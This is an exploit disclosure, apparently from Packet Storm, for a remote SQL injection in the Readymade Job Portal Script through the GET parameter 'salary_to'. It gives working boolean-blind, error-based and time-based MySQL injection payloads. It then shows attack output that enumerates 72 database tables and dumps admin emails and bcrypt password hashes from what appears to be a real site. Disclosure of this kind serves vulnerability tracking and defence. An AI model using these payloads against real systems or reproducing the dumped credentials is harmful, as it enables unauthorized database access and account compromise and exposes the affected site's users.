Readymade Job Portal Script suffers from a remote SQL injection vulnerability. The researcher requested version information from the vendor while reporting the vulnerability but the company has been unresponsive.
a6f79aba16a61d0c089fb29f3e1ad6b313edcd13d455647fae5155843541bad1┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : i-netsolution.com │ │ │
│ Vendor : i-Net Solution │ │ │
│ Software : Readymade Job Portal Script │ │ Job Portal is a website that serves │
│ Vuln Type: Remote SQL Injection │ │ as a bridge between employers │
│ Method : GET │ │ and job seekers │
│ Impact : Database Access │ │ │
│ │ │ │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, chamanwal, ix7
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
GET parameter 'salary_to' is vulnerable.
---
Parameter: salary_to (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: search=&salary_from=222&salary_to=333) AND 3040=3040 AND (4873=4873
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: search=&salary_from=222&salary_to=333) AND (SELECT 3022 FROM(SELECT COUNT(*),CONCAT(0x71706a7671,(SELECT (ELT(3022=3022,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1802=1802
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=&salary_from=222&salary_to=333) AND (SELECT 5992 FROM (SELECT(SLEEP(10)))wrGn) AND (8437=8437
---
[+] Starting the Attack
[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[INFO] fetching current database
current database: 'theminsall_jobportal_db'
[INFO] fetching tables for database: 'theminsall_jobportal_db'
Database: theminsall_jobportal_db
[72 tables]
+----------------------------------+
| admin_password_resets |
| admins |
| applicant_messages |
| blog_categories |
| blogs |
| career_levels |
| cities |
| cms |
| cms_content |
| companies |
| company_messages |
| company_password_resets |
| contact_messages |
| countries |
| countries_details |
| degree_levels |
| degree_types |
| failed_jobs |
| faqs |
| favourite_applicants |
| favourites_company |
| favourites_job |
| functional_areas |
| genders |
| industries |
| job_alerts |
| job_apply |
| job_apply_rejected |
| job_experiences |
| job_shifts |
| job_skills |
| job_titles |
| job_types |
| jobs |
| language_levels |
| languages |
| major_subjects |
| manage_job_skills |
| marital_statuses |
| migrations |
| ownership_types |
| packages |
| password_resets |
| payu_transactions |
| profile_cvs |
| profile_education_major_subjects |
| profile_educations |
| profile_experiences |
| profile_languages |
| profile_projects |
| profile_skills |
| profile_summaries |
| queue_jobs |
| report_abuse_company_messages |
| report_abuse_messages |
| result_types |
| roles |
| salary_periods |
| send_to_friend_messages |
| seo |
| site_settings |
| sliders |
| states |
| subscriptions |
| testimonials |
| unlocked_users |
| user_messages |
| users |
| videos |
| widget_pages |
| widgets |
| widgets_data |
+----------------------------------+
[INFO] fetching columns for table 'admins' in database 'theminsall_jobportal_db'
Database: theminsall_jobportal_db
Table: admins
[8 columns]
+----------------+------------------+
| Column | Type |
+----------------+------------------+
| created_at | timestamp |
| email | varchar(191) |
| id | int(10) unsigned |
| name | varchar(191) |
| password | varchar(191) |
| remember_token | varchar(100) |
| role_id | int(11) |
| updated_at | timestamp |
+----------------+------------------+
[INFO] fetching entries of column(s) 'email,id,name,password' for table 'admins' in database 'theminsall_jobportal_db'
Database: theminsall_jobportal_db
Table: admins
[3 entries]
+----+--------------------+--------------------------------------------------------------+-----------+
| id | email | password | name |
+----+--------------------+--------------------------------------------------------------+-----------+
| 3 | buyer@buyer.com | $2y$10$47ig/2wfYDc6EVg0iVnvp.l.jC0APqEVUjR7P6PFYTEhbNFzHPJ66 | Buyer |
| 4 | sub@jobsportal.com | $2y$10$uxtmaI.4Xrb3EEaLW6uvBuOKXyWCNtZ05pQFMwd6Jd1G0k9ZlKV/C | Sub Admin |
| 5 | admin@gmail.com | $2y$10$AvprFLS9PQXUs.3QVwyYZejm4FVYlKM02.nykVF.dVxS9D82I8ZLG | Admin |
+----+--------------------+--------------------------------------------------------------+-----------+
Possible Algorithms: bcrypt $2*$, Blowfish (Unix)
[-] Done
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed